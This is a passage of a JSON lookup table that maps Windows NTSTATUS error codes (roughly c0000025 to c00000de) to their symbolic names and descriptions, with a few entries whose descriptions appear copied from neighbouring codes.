Continue Windows cannot continue from this exception.\"\n        },\n        \"c0000026\": {\n            \"code\": \"STATUS_INVALID_DISPOSITION\",\n            \"description\": \"An invalid exception disposition was returned by an exception handler.\"\n        },\n        \"c0000027\": {\n            \"code\": \"STATUS_UNWIND\",\n            \"description\": \"Unwind exception code.\"\n        },\n        \"c0000028\": {\n            \"code\": \"STATUS_BAD_STACK\",\n            \"description\": \"An invalid or unaligned stack was encountered during an unwind operation.\"\n        },\n        \"c0000029\": {\n            \"code\": \"STATUS_INVALID_UNWIND_TARGET\",\n            \"description\": \"An invalid unwind target was encountered during an unwind operation.\"\n        },\n        \"c000002a\": {\n            \"code\": \"STATUS_NOT_LOCKED\",\n            \"description\": \"An attempt was made to unlock a page of memory that was not locked.\"\n        },\n        \"c000002b\": {\n            \"code\": \"STATUS_PARITY_ERROR\",\n            \"description\": \"A device parity error on an I/O operation.\"\n        },\n        \"c000002c\": {\n            \"code\": \"STATUS_UNABLE_TO_DECOMMIT_VM\",\n            \"description\": \"An attempt was made to decommit uncommitted virtual memory.\"\n        },\n        \"c000002d\": {\n            \"code\": \"STATUS_NOT_COMMITTED\",\n            \"description\": \"An attempt was made to change the attributes on memory that has not been committed.\"\n        },\n        \"c000002e\": {\n            \"code\": \"STATUS_INVALID_PORT_ATTRIBUTES\",\n            \"description\": \"Invalid object attributes specified to NtCreatePort or invalid port attributes specified to NtConnectPort.\"\n        },\n        \"c000002f\": {\n            \"code\": \"STATUS_PORT_MESSAGE_TOO_LONG\",\n            \"description\": \"The length of the message that was passed to NtRequestPort or NtRequestWaitReplyPort is longer than the maximum message that is allowed by the port.\"\n        },\n        \"c0000030\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_MIX\",\n            \"description\": \"An invalid combination of parameters was specified.\"\n        },\n        \"c0000031\": {\n            \"code\": \"STATUS_INVALID_QUOTA_LOWER\",\n            \"description\": \"An attempt was made to lower a quota limit below the current usage.\"\n        },\n        \"c0000032\": {\n            \"code\": \"STATUS_DISK_CORRUPT_ERROR\",\n            \"description\": \"{Corrupt Disk} The file system structure on the disk is corrupt and unusable. Run the Chkdsk utility on the volume %hs.\"\n        },\n        \"c0000033\": {\n            \"code\": \"STATUS_OBJECT_NAME_INVALID\",\n            \"description\": \"The object name is invalid.\"\n        },\n        \"c0000034\": {\n            \"code\": \"STATUS_OBJECT_NAME_NOT_FOUND\",\n            \"description\": \"The object name is not found.\"\n        },\n        \"c0000035\": {\n            \"code\": \"STATUS_OBJECT_NAME_COLLISION\",\n            \"description\": \"The object name already exists.\"\n        },\n        \"c0000037\": {\n            \"code\": \"STATUS_PORT_DISCONNECTED\",\n            \"description\": \"An attempt was made to send a message to a disconnected communication port.\"\n        },\n        \"c0000038\": {\n            \"code\": \"STATUS_DEVICE_ALREADY_ATTACHED\",\n            \"description\": \"An attempt was made to attach to a device that was already attached to another device.\"\n        },\n        \"c0000039\": {\n            \"code\": \"STATUS_OBJECT_PATH_INVALID\",\n            \"description\": \"The object path component was not a directory object.\"\n        },\n        \"c000003a\": {\n            \"code\": \"STATUS_OBJECT_PATH_NOT_FOUND\",\n            \"description\": \"{Path Not Found} The path %hs does not exist.\"\n        },\n        \"c000003b\": {\n            \"code\": \"STATUS_OBJECT_PATH_SYNTAX_BAD\",\n            \"description\": \"The object path component was not a directory object.\"\n        },\n        \"c000003c\": {\n            \"code\": \"STATUS_DATA_OVERRUN\",\n            \"description\": \"{Data Overrun} A data overrun error occurred.\"\n        },\n        \"c000003d\": {\n            \"code\": \"STATUS_DATA_LATE_ERROR\",\n            \"description\": \"{Data Late} A data late error occurred.\"\n        },\n        \"c000003e\": {\n            \"code\": \"STATUS_DATA_ERROR\",\n            \"description\": \"{Data Error} An error occurred in reading or writing data.\"\n        },\n        \"c000003f\": {\n            \"code\": \"STATUS_CRC_ERROR\",\n            \"description\": \"{Bad CRC} A cyclic redundancy check (CRC) checksum error occurred.\"\n        },\n        \"c0000040\": {\n            \"code\": \"STATUS_SECTION_TOO_BIG\",\n            \"description\": \"{Section Too Large} The specified section is too big to map the file.\"\n        },\n        \"c0000041\": {\n            \"code\": \"STATUS_PORT_CONNECTION_REFUSED\",\n            \"description\": \"The NtConnectPort request is refused.\"\n        },\n        \"c0000042\": {\n            \"code\": \"STATUS_INVALID_PORT_HANDLE\",\n            \"description\": \"The type of port handle is invalid for the operation that is requested.\"\n        },\n        \"c0000043\": {\n            \"code\": \"STATUS_SHARING_VIOLATION\",\n            \"description\": \"A file cannot be opened because the share access flags are incompatible.\"\n        },\n        \"c0000044\": {\n            \"code\": \"STATUS_QUOTA_EXCEEDED\",\n            \"description\": \"Insufficient quota exists to complete the operation.\"\n        },\n        \"c0000045\": {\n            \"code\": \"STATUS_INVALID_PAGE_PROTECTION\",\n            \"description\": \"The specified page protection was not valid.\"\n        },\n        \"c0000046\": {\n            \"code\": \"STATUS_MUTANT_NOT_OWNED\",\n            \"description\": \"An attempt to release a mutant object was made by a thread that was not the owner of the mutant object.\"\n        },\n        \"c0000047\": {\n            \"code\": \"STATUS_SEMAPHORE_LIMIT_EXCEEDED\",\n            \"description\": \"An attempt was made to release a semaphore such that its maximum count would have been exceeded.\"\n        },\n        \"c0000048\": {\n            \"code\": \"STATUS_PORT_ALREADY_SET\",\n            \"description\": \"An attempt was made to set the DebugPort or ExceptionPort of a process, but a port already exists in the process, or an attempt was made to set the CompletionPort of a file but a port was already set in the file, or an attempt was made to set the associated completion port of an ALPC port but it is already set.\"\n        },\n        \"c0000049\": {\n            \"code\": \"STATUS_SECTION_NOT_IMAGE\",\n            \"description\": \"An attempt was made to query image information on a section that does not map an image.\"\n        },\n        \"c000004a\": {\n            \"code\": \"STATUS_SUSPEND_COUNT_EXCEEDED\",\n            \"description\": \"An attempt was made to suspend a thread whose suspend count was at its maximum.\"\n        },\n        \"c000004b\": {\n            \"code\": \"STATUS_THREAD_IS_TERMINATING\",\n            \"description\": \"An attempt was made to suspend a thread that has begun termination.\"\n        },\n        \"c000004c\": {\n            \"code\": \"STATUS_BAD_WORKING_SET_LIMIT\",\n            \"description\": \"An attempt was made to set the working set limit to an invalid value (for example, the minimum greater than maximum).\"\n        },\n        \"c000004d\": {\n            \"code\": \"STATUS_INCOMPATIBLE_FILE_MAP\",\n            \"description\": \"A section was created to map a file that is not compatible with an already existing section that maps the same file.\"\n        },\n        \"c000004e\": {\n            \"code\": \"STATUS_SECTION_PROTECTION\",\n            \"description\": \"A view to a section specifies a protection that is incompatible with the protection of the initial view.\"\n        },\n        \"c000004f\": {\n            \"code\": \"STATUS_EAS_NOT_SUPPORTED\",\n            \"description\": \"An operation involving EAs failed because the file system does not support EAs.\"\n        },\n        \"c0000050\": {\n            \"code\": \"STATUS_EA_TOO_LARGE\",\n            \"description\": \"An EA operation failed because the EA set is too large.\"\n        },\n        \"c0000051\": {\n            \"code\": \"STATUS_NONEXISTENT_EA_ENTRY\",\n            \"description\": \"An EA operation failed because the name or EA index is invalid.\"\n        },\n        \"c0000052\": {\n            \"code\": \"STATUS_NO_EAS_ON_FILE\",\n            \"description\": \"The file for which EAs were requested has no EAs.\"\n        },\n        \"c0000053\": {\n            \"code\": \"STATUS_EA_CORRUPT_ERROR\",\n            \"description\": \"The EA is corrupt and cannot be read.\"\n        },\n        \"c0000054\": {\n            \"code\": \"STATUS_FILE_LOCK_CONFLICT\",\n            \"description\": \"A requested read/write cannot be granted due to a conflicting file lock.\"\n        },\n        \"c0000055\": {\n            \"code\": \"STATUS_LOCK_NOT_GRANTED\",\n            \"description\": \"A requested file lock cannot be granted due to other existing locks.\"\n        },\n        \"c0000056\": {\n            \"code\": \"STATUS_DELETE_PENDING\",\n            \"description\": \"A non-close operation has been requested of a file object that has a delete pending.\"\n        },\n        \"c0000057\": {\n            \"code\": \"STATUS_CTL_FILE_NOT_SUPPORTED\",\n            \"description\": \"An attempt was made to set the control attribute on a file. This attribute is not supported in the destination file system.\"\n        },\n        \"c0000058\": {\n            \"code\": \"STATUS_UNKNOWN_REVISION\",\n            \"description\": \"Indicates a revision number that was encountered or specified is not one that is known by the service. It might be a more recent revision than the service is aware of.\"\n        },\n        \"c0000059\": {\n            \"code\": \"STATUS_REVISION_MISMATCH\",\n            \"description\": \"Indicates that two revision levels are incompatible.\"\n        },\n        \"c000005a\": {\n            \"code\": \"STATUS_INVALID_OWNER\",\n            \"description\": \"Indicates a particular security ID cannot be assigned as the owner of an object.\"\n        },\n        \"c000005b\": {\n            \"code\": \"STATUS_INVALID_PRIMARY_GROUP\",\n            \"description\": \"Indicates a particular security ID cannot be assigned as the primary group of an object.\"\n        },\n        \"c000005c\": {\n            \"code\": \"STATUS_NO_IMPERSONATION_TOKEN\",\n            \"description\": \"An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client.\"\n        },\n        \"c000005d\": {\n            \"code\": \"STATUS_CANT_DISABLE_MANDATORY\",\n            \"description\": \"A mandatory group cannot be disabled.\"\n        },\n        \"c000005e\": {\n            \"code\": \"STATUS_NO_LOGON_SERVERS\",\n            \"description\": \"No logon servers are currently available to service the logon request.\"\n        },\n        \"c000005f\": {\n            \"code\": \"STATUS_NO_SUCH_LOGON_SESSION\",\n            \"description\": \"A specified logon session does not exist. It might already have been terminated.\"\n        },\n        \"c0000060\": {\n            \"code\": \"STATUS_NO_SUCH_PRIVILEGE\",\n            \"description\": \"A specified privilege does not exist.\"\n        },\n        \"c0000061\": {\n            \"code\": \"STATUS_PRIVILEGE_NOT_HELD\",\n            \"description\": \"A required privilege is not held by the client.\"\n        },\n        \"c0000062\": {\n            \"code\": \"STATUS_INVALID_ACCOUNT_NAME\",\n            \"description\": \"The name provided is not a properly formed account name.\"\n        },\n        \"c0000063\": {\n            \"code\": \"STATUS_USER_EXISTS\",\n            \"description\": \"The specified account already exists.\"\n        },\n        \"c0000064\": {\n            \"code\": \"STATUS_NO_SUCH_USER\",\n            \"description\": \"The specified account does not exist.\"\n        },\n        \"c0000065\": {\n            \"code\": \"STATUS_GROUP_EXISTS\",\n            \"description\": \"The specified group already exists.\"\n        },\n        \"c0000066\": {\n            \"code\": \"STATUS_NO_SUCH_GROUP\",\n            \"description\": \"The specified group does not exist.\"\n        },\n        \"c0000067\": {\n            \"code\": \"STATUS_MEMBER_IN_GROUP\",\n            \"description\": \"The specified user account is already in the specified group account. Also used to indicate a group cannot be deleted because it contains a member.\"\n        },\n        \"c0000068\": {\n            \"code\": \"STATUS_MEMBER_NOT_IN_GROUP\",\n            \"description\": \"The specified user account is not a member of the specified group account.\"\n        },\n        \"c0000069\": {\n            \"code\": \"STATUS_LAST_ADMIN\",\n            \"description\": \"Indicates the requested operation would disable or delete the last remaining administration account. This is not allowed to prevent creating a situation in which the system cannot be administrated.\"\n        },\n        \"c000006a\": {\n            \"code\": \"STATUS_WRONG_PASSWORD\",\n            \"description\": \"When trying to update a password, this return status indicates that the value provided as the current password is not correct.\"\n        },\n        \"c000006b\": {\n            \"code\": \"STATUS_ILL_FORMED_PASSWORD\",\n            \"description\": \"When trying to update a password, this return status indicates that the value provided for the new password contains values that are not allowed in passwords.\"\n        },\n        \"c000006c\": {\n            \"code\": \"STATUS_PASSWORD_RESTRICTION\",\n            \"description\": \"When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria.\"\n        },\n        \"c000006d\": {\n            \"code\": \"STATUS_LOGON_FAILURE\",\n            \"description\": \"The attempted logon is invalid. This is either due to a bad username or authentication information.\"\n        },\n        \"c000006e\": {\n            \"code\": \"STATUS_ACCOUNT_RESTRICTION\",\n            \"description\": \"Indicates a referenced user name and authentication information are valid, but some user account restriction has prevented successful authentication (such as time-of-day restrictions).\"\n        },\n        \"c000006f\": {\n            \"code\": \"STATUS_INVALID_LOGON_HOURS\",\n            \"description\": \"The user account has time restrictions and cannot be logged onto at this time.\"\n        },\n        \"c0000070\": {\n            \"code\": \"STATUS_INVALID_WORKSTATION\",\n            \"description\": \"The user account is restricted so that it cannot be used to log on from the source workstation.\"\n        },\n        \"c0000071\": {\n            \"code\": \"STATUS_PASSWORD_EXPIRED\",\n            \"description\": \"The user account password has expired.\"\n        },\n        \"c0000072\": {\n            \"code\": \"STATUS_ACCOUNT_DISABLED\",\n            \"description\": \"The referenced account is currently disabled and cannot be logged on to.\"\n        },\n        \"c0000073\": {\n            \"code\": \"STATUS_NONE_MAPPED\",\n            \"description\": \"None of the information to be translated has been translated.\"\n        },\n        \"c0000074\": {\n            \"code\": \"STATUS_TOO_MANY_LUIDS_REQUESTED\",\n            \"description\": \"The number of LUIDs requested cannot be allocated with a single allocation.\"\n        },\n        \"c0000075\": {\n            \"code\": \"STATUS_LUIDS_EXHAUSTED\",\n            \"description\": \"Indicates there are no more LUIDs to allocate.\"\n        },\n        \"c0000076\": {\n            \"code\": \"STATUS_INVALID_SUB_AUTHORITY\",\n            \"description\": \"Indicates the sub-authority value is invalid for the particular use.\"\n        },\n        \"c0000077\": {\n            \"code\": \"STATUS_INVALID_ACL\",\n            \"description\": \"Indicates the ACL structure is not valid.\"\n        },\n        \"c0000078\": {\n            \"code\": \"STATUS_INVALID_SID\",\n            \"description\": \"Indicates the SID structure is not valid.\"\n        },\n        \"c0000079\": {\n            \"code\": \"STATUS_INVALID_SECURITY_DESCR\",\n            \"description\": \"Indicates the SECURITY_DESCRIPTOR structure is not valid.\"\n        },\n        \"c000007a\": {\n            \"code\": \"STATUS_PROCEDURE_NOT_FOUND\",\n            \"description\": \"Indicates the specified procedure address cannot be found in the DLL.\"\n        },\n        \"c000007b\": {\n            \"code\": \"STATUS_INVALID_IMAGE_FORMAT\",\n            \"description\": \"{Bad Image} %hs is either not designed to run on Windows or it contains an error. Try installing the program again using the original installation media or contact your system administrator or the software vendor for support.\"\n        },\n        \"c000007c\": {\n            \"code\": \"STATUS_NO_TOKEN\",\n            \"description\": \"An attempt was made to reference a token that does not exist. This is typically done by referencing the token that is associated with a thread when the thread is not impersonating a client.\"\n        },\n        \"c000007d\": {\n            \"code\": \"STATUS_BAD_INHERITANCE_ACL\",\n            \"description\": \"Indicates that an attempt to build either an inherited ACL or ACE was not successful. This can be caused by a number of things. One of the more probable causes is the replacement of a CreatorId with a SID that did not fit into the ACE or ACL.\"\n        },\n        \"c000007e\": {\n            \"code\": \"STATUS_RANGE_NOT_LOCKED\",\n            \"description\": \"The range specified in NtUnlockFile was not locked.\"\n        },\n        \"c000007f\": {\n            \"code\": \"STATUS_DISK_FULL\",\n            \"description\": \"An operation failed because the disk was full.\"\n        },\n        \"c0000080\": {\n            \"code\": \"STATUS_SERVER_DISABLED\",\n            \"description\": \"The GUID allocation server is disabled at the moment.\"\n        },\n        \"c0000081\": {\n            \"code\": \"STATUS_SERVER_NOT_DISABLED\",\n            \"description\": \"The GUID allocation server is enabled at the moment.\"\n        },\n        \"c0000082\": {\n            \"code\": \"STATUS_TOO_MANY_GUIDS_REQUESTED\",\n            \"description\": \"Too many GUIDs were requested from the allocation server at once.\"\n        },\n        \"c0000083\": {\n            \"code\": \"STATUS_GUIDS_EXHAUSTED\",\n            \"description\": \"The GUIDs could not be allocated because the Authority Agent was exhausted.\"\n        },\n        \"c0000084\": {\n            \"code\": \"STATUS_INVALID_ID_AUTHORITY\",\n            \"description\": \"The value provided was an invalid value for an identifier authority.\"\n        },\n        \"c0000085\": {\n            \"code\": \"STATUS_AGENTS_EXHAUSTED\",\n            \"description\": \"No more authority agent values are available for the particular identifier authority value.\"\n        },\n        \"c0000086\": {\n            \"code\": \"STATUS_INVALID_VOLUME_LABEL\",\n            \"description\": \"An invalid volume label has been specified.\"\n        },\n        \"c0000087\": {\n            \"code\": \"STATUS_SECTION_NOT_EXTENDED\",\n            \"description\": \"A mapped section could not be extended.\"\n        },\n        \"c0000088\": {\n            \"code\": \"STATUS_NOT_MAPPED_DATA\",\n            \"description\": \"Specified section to flush does not map a data file.\"\n        },\n        \"c0000089\": {\n            \"code\": \"STATUS_RESOURCE_DATA_NOT_FOUND\",\n            \"description\": \"Indicates the specified image file did not contain a resource section.\"\n        },\n        \"c000008a\": {\n            \"code\": \"STATUS_RESOURCE_TYPE_NOT_FOUND\",\n            \"description\": \"Indicates the specified resource type cannot be found in the image file.\"\n        },\n        \"c000008b\": {\n            \"code\": \"STATUS_RESOURCE_NAME_NOT_FOUND\",\n            \"description\": \"Indicates the specified resource name cannot be found in the image file.\"\n        },\n        \"c000008c\": {\n            \"code\": \"STATUS_ARRAY_BOUNDS_EXCEEDED\",\n            \"description\": \"{EXCEPTION} Array bounds exceeded.\"\n        },\n        \"c000008d\": {\n            \"code\": \"STATUS_FLOAT_DENORMAL_OPERAND\",\n            \"description\": \"{EXCEPTION} Floating-point denormal operand.\"\n        },\n        \"c000008e\": {\n            \"code\": \"STATUS_FLOAT_DIVIDE_BY_ZERO\",\n            \"description\": \"{EXCEPTION} Floating-point division by zero.\"\n        },\n        \"c000008f\": {\n            \"code\": \"STATUS_FLOAT_INEXACT_RESULT\",\n            \"description\": \"{EXCEPTION} Floating-point inexact result.\"\n        },\n        \"c0000090\": {\n            \"code\": \"STATUS_FLOAT_INVALID_OPERATION\",\n            \"description\": \"{EXCEPTION} Floating-point invalid operation.\"\n        },\n        \"c0000091\": {\n            \"code\": \"STATUS_FLOAT_OVERFLOW\",\n            \"description\": \"{EXCEPTION} Floating-point overflow.\"\n        },\n        \"c0000092\": {\n            \"code\": \"STATUS_FLOAT_STACK_CHECK\",\n            \"description\": \"{EXCEPTION} Floating-point stack check.\"\n        },\n        \"c0000093\": {\n            \"code\": \"STATUS_FLOAT_UNDERFLOW\",\n            \"description\": \"{EXCEPTION} Floating-point underflow.\"\n        },\n        \"c0000094\": {\n            \"code\": \"STATUS_INTEGER_DIVIDE_BY_ZERO\",\n            \"description\": \"{EXCEPTION} Integer division by zero.\"\n        },\n        \"c0000095\": {\n            \"code\": \"STATUS_INTEGER_OVERFLOW\",\n            \"description\": \"{EXCEPTION} Integer overflow.\"\n        },\n        \"c0000096\": {\n            \"code\": \"STATUS_PRIVILEGED_INSTRUCTION\",\n            \"description\": \"{EXCEPTION} Privileged instruction.\"\n        },\n        \"c0000097\": {\n            \"code\": \"STATUS_TOO_MANY_PAGING_FILES\",\n            \"description\": \"An attempt was made to install more paging files than the system supports.\"\n        },\n        \"c0000098\": {\n            \"code\": \"STATUS_FILE_INVALID\",\n            \"description\": \"The volume for a file has been externally altered such that the opened file is no longer valid.\"\n        },\n        \"c0000099\": {\n            \"code\": \"STATUS_ALLOTTED_SPACE_EXCEEDED\",\n            \"description\": \"When a block of memory is allotted for future updates, such as the memory allocated to hold discretionary access control and primary group information, successive updates might exceed the amount of memory originally allotted. Because a quota might already have been charged to several processes that have handles to the object, it is not reasonable to alter the size of the allocated memory. Instead, a request that requires more memory than has been allotted must fail and the STATUS_ALLOTTED_SPACE_EXCEEDED error returned.\"\n        },\n        \"c000009a\": {\n            \"code\": \"STATUS_INSUFFICIENT_RESOURCES\",\n            \"description\": \"Insufficient system resources exist to complete the API.\"\n        },\n        \"c000009b\": {\n            \"code\": \"STATUS_DFS_EXIT_PATH_FOUND\",\n            \"description\": \"An attempt has been made to open a DFS exit path control file.\"\n        },\n        \"c000009c\": {\n            \"code\": \"STATUS_DEVICE_DATA_ERROR\",\n            \"description\": \"There are bad blocks (sectors) on the hard disk.\"\n        },\n        \"c000009d\": {\n            \"code\": \"STATUS_DEVICE_NOT_CONNECTED\",\n            \"description\": \"There is bad cabling, non-termination, or the controller is not able to obtain access to the hard disk.\"\n        },\n        \"c000009f\": {\n            \"code\": \"STATUS_FREE_VM_NOT_AT_BASE\",\n            \"description\": \"Virtual memory cannot be freed because the base address is not the base of the region and a region size of zero was specified.\"\n        },\n        \"c00000a0\": {\n            \"code\": \"STATUS_MEMORY_NOT_ALLOCATED\",\n            \"description\": \"An attempt was made to free virtual memory that is not allocated.\"\n        },\n        \"c00000a1\": {\n            \"code\": \"STATUS_WORKING_SET_QUOTA\",\n            \"description\": \"The working set is not big enough to allow the requested pages to be locked.\"\n        },\n        \"c00000a2\": {\n            \"code\": \"STATUS_MEDIA_WRITE_PROTECTED\",\n            \"description\": \"{Write Protect Error} The disk cannot be written to because it is write-protected. Remove the write protection from the volume %hs in drive %hs.\"\n        },\n        \"c00000a3\": {\n            \"code\": \"STATUS_DEVICE_NOT_READY\",\n            \"description\": \"{Drive Not Ready} The drive is not ready for use; its door might be open. Check drive %hs and make sure that a disk is inserted and that the drive door is closed.\"\n        },\n        \"c00000a4\": {\n            \"code\": \"STATUS_INVALID_GROUP_ATTRIBUTES\",\n            \"description\": \"The specified attributes are invalid or are incompatible with the attributes for the group as a whole.\"\n        },\n        \"c00000a5\": {\n            \"code\": \"STATUS_BAD_IMPERSONATION_LEVEL\",\n            \"description\": \"A specified impersonation level is invalid. Also used to indicate that a required impersonation level was not provided.\"\n        },\n        \"c00000a6\": {\n            \"code\": \"STATUS_CANT_OPEN_ANONYMOUS\",\n            \"description\": \"An attempt was made to open an anonymous-level token. Anonymous tokens cannot be opened.\"\n        },\n        \"c00000a7\": {\n            \"code\": \"STATUS_BAD_VALIDATION_CLASS\",\n            \"description\": \"The validation information class requested was invalid.\"\n        },\n        \"c00000a8\": {\n            \"code\": \"STATUS_BAD_TOKEN_TYPE\",\n            \"description\": \"The type of a token object is inappropriate for its attempted use.\"\n        },\n        \"c00000a9\": {\n            \"code\": \"STATUS_BAD_MASTER_BOOT_RECORD\",\n            \"description\": \"The type of a token object is inappropriate for its attempted use.\"\n        },\n        \"c00000aa\": {\n            \"code\": \"STATUS_INSTRUCTION_MISALIGNMENT\",\n            \"description\": \"An attempt was made to execute an instruction at an unaligned address and the host system does not support unaligned instruction references.\"\n        },\n        \"c00000ab\": {\n            \"code\": \"STATUS_INSTANCE_NOT_AVAILABLE\",\n            \"description\": \"The maximum named pipe instance count has been reached.\"\n        },\n        \"c00000ac\": {\n            \"code\": \"STATUS_PIPE_NOT_AVAILABLE\",\n            \"description\": \"An instance of a named pipe cannot be found in the listening state.\"\n        },\n        \"c00000ad\": {\n            \"code\": \"STATUS_INVALID_PIPE_STATE\",\n            \"description\": \"The named pipe is not in the connected or closing state.\"\n        },\n        \"c00000ae\": {\n            \"code\": \"STATUS_PIPE_BUSY\",\n            \"description\": \"The specified pipe is set to complete operations and there are current I/O operations queued so that it cannot be changed to queue operations.\"\n        },\n        \"c00000af\": {\n            \"code\": \"STATUS_ILLEGAL_FUNCTION\",\n            \"description\": \"The specified handle is not open to the server end of the named pipe.\"\n        },\n        \"c00000b0\": {\n            \"code\": \"STATUS_PIPE_DISCONNECTED\",\n            \"description\": \"The specified named pipe is in the disconnected state.\"\n        },\n        \"c00000b1\": {\n            \"code\": \"STATUS_PIPE_CLOSING\",\n            \"description\": \"The specified named pipe is in the closing state.\"\n        },\n        \"c00000b2\": {\n            \"code\": \"STATUS_PIPE_CONNECTED\",\n            \"description\": \"The specified named pipe is in the connected state.\"\n        },\n        \"c00000b3\": {\n            \"code\": \"STATUS_PIPE_LISTENING\",\n            \"description\": \"The specified named pipe is in the listening state.\"\n        },\n        \"c00000b4\": {\n            \"code\": \"STATUS_INVALID_READ_MODE\",\n            \"description\": \"The specified named pipe is not in message mode.\"\n        },\n        \"c00000b5\": {\n            \"code\": \"STATUS_IO_TIMEOUT\",\n            \"description\": \"{Device Timeout} The specified I/O operation on %hs was not completed before the time-out period expired.\"\n        },\n        \"c00000b6\": {\n            \"code\": \"STATUS_FILE_FORCED_CLOSED\",\n            \"description\": \"The specified file has been closed by another process.\"\n        },\n        \"c00000b7\": {\n            \"code\": \"STATUS_PROFILING_NOT_STARTED\",\n            \"description\": \"Profiling is not started.\"\n        },\n        \"c00000b8\": {\n            \"code\": \"STATUS_PROFILING_NOT_STOPPED\",\n            \"description\": \"Profiling is not stopped.\"\n        },\n        \"c00000b9\": {\n            \"code\": \"STATUS_COULD_NOT_INTERPRET\",\n            \"description\": \"The passed ACL did not contain the minimum required information.\"\n        },\n        \"c00000ba\": {\n            \"code\": \"STATUS_FILE_IS_A_DIRECTORY\",\n            \"description\": \"The file that was specified as a target is a directory, and the caller specified that it could be anything but a directory.\"\n        },\n        \"c00000bb\": {\n            \"code\": \"STATUS_NOT_SUPPORTED\",\n            \"description\": \"The request is not supported.\"\n        },\n        \"c00000bc\": {\n            \"code\": \"STATUS_REMOTE_NOT_LISTENING\",\n            \"description\": \"This remote computer is not listening.\"\n        },\n        \"c00000bd\": {\n            \"code\": \"STATUS_DUPLICATE_NAME\",\n            \"description\": \"A duplicate name exists on the network.\"\n        },\n        \"c00000be\": {\n            \"code\": \"STATUS_BAD_NETWORK_PATH\",\n            \"description\": \"The network path cannot be located.\"\n        },\n        \"c00000bf\": {\n            \"code\": \"STATUS_NETWORK_BUSY\",\n            \"description\": \"The network is busy.\"\n        },\n        \"c00000c0\": {\n            \"code\": \"STATUS_DEVICE_DOES_NOT_EXIST\",\n            \"description\": \"This device does not exist.\"\n        },\n        \"c00000c1\": {\n            \"code\": \"STATUS_TOO_MANY_COMMANDS\",\n            \"description\": \"The network BIOS command limit has been reached.\"\n        },\n        \"c00000c2\": {\n            \"code\": \"STATUS_ADAPTER_HARDWARE_ERROR\",\n            \"description\": \"An I/O adapter hardware error has occurred.\"\n        },\n        \"c00000c3\": {\n            \"code\": \"STATUS_INVALID_NETWORK_RESPONSE\",\n            \"description\": \"The network responded incorrectly.\"\n        },\n        \"c00000c4\": {\n            \"code\": \"STATUS_UNEXPECTED_NETWORK_ERROR\",\n            \"description\": \"An unexpected network error occurred.\"\n        },\n        \"c00000c5\": {\n            \"code\": \"STATUS_BAD_REMOTE_ADAPTER\",\n            \"description\": \"The remote adapter is not compatible.\"\n        },\n        \"c00000c6\": {\n            \"code\": \"STATUS_PRINT_QUEUE_FULL\",\n            \"description\": \"The print queue is full.\"\n        },\n        \"c00000c7\": {\n            \"code\": \"STATUS_NO_SPOOL_SPACE\",\n            \"description\": \"Space to store the file that is waiting to be printed is not available on the server.\"\n        },\n        \"c00000c8\": {\n            \"code\": \"STATUS_PRINT_CANCELLED\",\n            \"description\": \"The requested print file has been canceled.\"\n        },\n        \"c00000c9\": {\n            \"code\": \"STATUS_NETWORK_NAME_DELETED\",\n            \"description\": \"The network name was deleted.\"\n        },\n        \"c00000ca\": {\n            \"code\": \"STATUS_NETWORK_ACCESS_DENIED\",\n            \"description\": \"Network access is denied.\"\n        },\n        \"c00000cb\": {\n            \"code\": \"STATUS_BAD_DEVICE_TYPE\",\n            \"description\": \"{Incorrect Network Resource Type} The specified device type (LPT, for example) conflicts with the actual device type on the remote resource.\"\n        },\n        \"c00000cc\": {\n            \"code\": \"STATUS_BAD_NETWORK_NAME\",\n            \"description\": \"{Network Name Not Found} The specified share name cannot be found on the remote server.\"\n        },\n        \"c00000cd\": {\n            \"code\": \"STATUS_TOO_MANY_NAMES\",\n            \"description\": \"The name limit for the network adapter card of the local computer was exceeded.\"\n        },\n        \"c00000ce\": {\n            \"code\": \"STATUS_TOO_MANY_SESSIONS\",\n            \"description\": \"The network BIOS session limit was exceeded.\"\n        },\n        \"c00000cf\": {\n            \"code\": \"STATUS_SHARING_PAUSED\",\n            \"description\": \"File sharing has been temporarily paused.\"\n        },\n        \"c00000d0\": {\n            \"code\": \"STATUS_REQUEST_NOT_ACCEPTED\",\n            \"description\": \"No more connections can be made to this remote computer at this time because the computer has already accepted the maximum number of connections.\"\n        },\n        \"c00000d1\": {\n            \"code\": \"STATUS_REDIRECTOR_PAUSED\",\n            \"description\": \"Print or disk redirection is temporarily paused.\"\n        },\n        \"c00000d2\": {\n            \"code\": \"STATUS_NET_WRITE_FAULT\",\n            \"description\": \"A network data fault occurred.\"\n        },\n        \"c00000d3\": {\n            \"code\": \"STATUS_PROFILING_AT_LIMIT\",\n            \"description\": \"The number of active profiling objects is at the maximum and no more can be started.\"\n        },\n        \"c00000d4\": {\n            \"code\": \"STATUS_NOT_SAME_DEVICE\",\n            \"description\": \"{Incorrect Volume} The destination file of a rename request is located on a different device than the source of the rename request.\"\n        },\n        \"c00000d5\": {\n            \"code\": \"STATUS_FILE_RENAMED\",\n            \"description\": \"The specified file has been renamed and thus cannot be modified.\"\n        },\n        \"c00000d6\": {\n            \"code\": \"STATUS_VIRTUAL_CIRCUIT_CLOSED\",\n            \"description\": \"{Network Request Timeout} The session with a remote server has been disconnected because the time-out interval for a request has expired.\"\n        },\n        \"c00000d7\": {\n            \"code\": \"STATUS_NO_SECURITY_ON_OBJECT\",\n            \"description\": \"Indicates an attempt was made to operate on the security of an object that does not have security associated with it.\"\n        },\n        \"c00000d8\": {\n            \"code\": \"STATUS_CANT_WAIT\",\n            \"description\": \"Used to indicate that an operation cannot continue without blocking for I/O.\"\n        },\n        \"c00000d9\": {\n            \"code\": \"STATUS_PIPE_EMPTY\",\n            \"description\": \"Used to indicate that a read operation was done on an empty pipe.\"\n        },\n        \"c00000da\": {\n            \"code\": \"STATUS_CANT_ACCESS_DOMAIN_INFO\",\n            \"description\": \"Configuration information could not be read from the domain controller, either because the machine is unavailable or access has been denied.\"\n        },\n        \"c00000db\": {\n            \"code\": \"STATUS_CANT_TERMINATE_SELF\",\n            \"description\": \"Indicates that a thread attempted to terminate itself by default (called NtTerminateThread with NULL) and it was the last thread in the current process.\"\n        },\n        \"c00000dc\": {\n            \"code\": \"STATUS_INVALID_SERVER_STATE\",\n            \"description\": \"Indicates the Sam Server was in the wrong state to perform the desired operation.\"\n        },\n        \"c00000dd\": {\n            \"code\": \"STATUS_INVALID_DOMAIN_STATE\",\n            \"description\": \"Indicates the domain was in the wrong state to perform the desired operation.\"\n        },\n        \"c00000de\": {\n            \"code\": \"STATUS_INVALID_DOMAIN_ROLE\",\n            \"description\": \"This operation is only allowed for the primary domain 